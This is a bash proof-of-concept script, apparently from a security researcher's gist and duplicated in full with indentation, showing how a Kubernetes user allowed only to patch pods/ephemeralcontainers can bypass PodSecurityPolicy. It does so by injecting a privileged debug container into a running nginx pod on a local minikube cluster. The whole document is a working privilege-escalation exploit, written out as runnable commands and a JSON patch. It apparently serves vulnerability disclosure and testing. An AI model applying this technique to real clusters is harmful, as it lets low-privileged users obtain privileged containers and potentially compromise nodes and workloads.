mtardy/POC_psp_bypass_ephemeral_containers.sh

## POC_psp_bypass_ephemeral_containers.sh
#!/bin/bash

set -e
set -o pipefail

function print {
    printf "\n[+] $1\n"
}

function retry_for_command_success {
    n=0; until ((n >= 60)); do
        eval "$1" && break;
        n=$((n + 1));
        sleep 1;
    done; ((n < 60))
}

KUBERNETES_VERSION="v1.24.1"

# Creating a k8s cluster with PSP on with minikube
minikube start --kubernetes-version=$KUBERNETES_VERSION --extra-config=apiserver.enable-admission-plugins=PodSecurityPolicy --addons=pod-security-policy

print "Checking that PSP are enabled"
kubectl get psp

print "Waiting for the cluster to be ready, i.e. the default serviceaccount to be created"
retry_for_command_success "kubectl -n default get serviceaccount default -o name"

print "Creating a regular nginx pod with admin cred"
kubectl run nginx --image=nginx

print "Creating a fake user with only patch on pods/ephemeralcontainers"
kubectl create serviceaccount fake-user
kubectl create role fake-debugger --verb=patch --resource=pods/ephemeralcontainers
kubectl create rolebinding fake-debugger-binding --role=fake-debugger --user=fake-user

print "Listing fake user rights"
kubectl --as=fake-user auth can-i --list

print "Opening API proxy as fake user"
kubectl proxy --as=fake-user &
# stop the proxy background process in case of termination
trap "kill $!" SIGINT SIGTERM EXIT
print "Sleeping for a few seconds for the proxy to open"
sleep 3

print "Waiting for the nginx pod to be ready"
kubectl wait --for=condition=Ready pod/nginx

print "Sending the patch for the privileged ephemeral container as the fake user"
curl localhost:8001/api/v1/namespaces/default/pods/nginx/ephemeralcontainers \
  -XPATCH \
  -H 'Content-Type: application/strategic-merge-patch+json' \
  -d '
{
    "spec":
    {
        "ephemeralContainers":
        [
            {
                "name": "debugger",
                "command": ["kdigger", "dig", "cap"],
                "image": "nixery.dev/kdigger",
                "targetContainerName": "nginx",
                "securityContext": {
                  "privileged": true
                },
                "stdin": true,
                "tty": true
            }
        ]
    }
}'

echo
print "Trying to get the logs from the privileged debug container to verify that it is privileged. Wait until the container image is downloaded and the container is done!"

retry_for_command_success "kubectl logs nginx -c debugger"

print "Removing the minikube cluster, you can use \"minikube delete --purge\" to remove everything in the ~/.minikube folder or just delete that folder."
minikube delete
	#!/bin/bash

	set -e
	set -o pipefail

	function print {
	printf "\n[+] $1\n"
	}

	function retry_for_command_success {
	n=0; until ((n >= 60)); do
	eval "$1" && break;
	n=$((n + 1));
	sleep 1;
	done; ((n < 60))
	}

	KUBERNETES_VERSION="v1.24.1"

	# Creating a k8s cluster with PSP on with minikube
	minikube start --kubernetes-version=$KUBERNETES_VERSION --extra-config=apiserver.enable-admission-plugins=PodSecurityPolicy --addons=pod-security-policy

	print "Checking that PSP are enabled"
	kubectl get psp

	print "Waiting for the cluster to be ready, i.e. the default serviceaccount to be created"
	retry_for_command_success "kubectl -n default get serviceaccount default -o name"

	print "Creating a regular nginx pod with admin cred"
	kubectl run nginx --image=nginx

	print "Creating a fake user with only patch on pods/ephemeralcontainers"
	kubectl create serviceaccount fake-user
	kubectl create role fake-debugger --verb=patch --resource=pods/ephemeralcontainers
	kubectl create rolebinding fake-debugger-binding --role=fake-debugger --user=fake-user

	print "Listing fake user rights"
	kubectl --as=fake-user auth can-i --list

	print "Opening API proxy as fake user"
	kubectl proxy --as=fake-user &
	# stop the proxy background process in case of termination
	trap "kill $!" SIGINT SIGTERM EXIT
	print "Sleeping for a few seconds for the proxy to open"
	sleep 3

	print "Waiting for the nginx pod to be ready"
	kubectl wait --for=condition=Ready pod/nginx

	print "Sending the patch for the privileged ephemeral container as the fake user"
	curl localhost:8001/api/v1/namespaces/default/pods/nginx/ephemeralcontainers \
	-XPATCH \
	-H 'Content-Type: application/strategic-merge-patch+json' \
	-d '
	{
	"spec":
	{
	"ephemeralContainers":
	[
	{
	"name": "debugger",
	"command": ["kdigger", "dig", "cap"],
	"image": "nixery.dev/kdigger",
	"targetContainerName": "nginx",
	"securityContext": {
	"privileged": true
	},
	"stdin": true,
	"tty": true
	}
	]
	}
	}'

	echo
	print "Trying to get the logs from the privileged debug container to verify that it is privileged. Wait until the container image is downloaded and the container is done!"

	retry_for_command_success "kubectl logs nginx -c debugger"

	print "Removing the minikube cluster, you can use \"minikube delete --purge\" to remove everything in the ~/.minikube folder or just delete that folder."
	minikube delete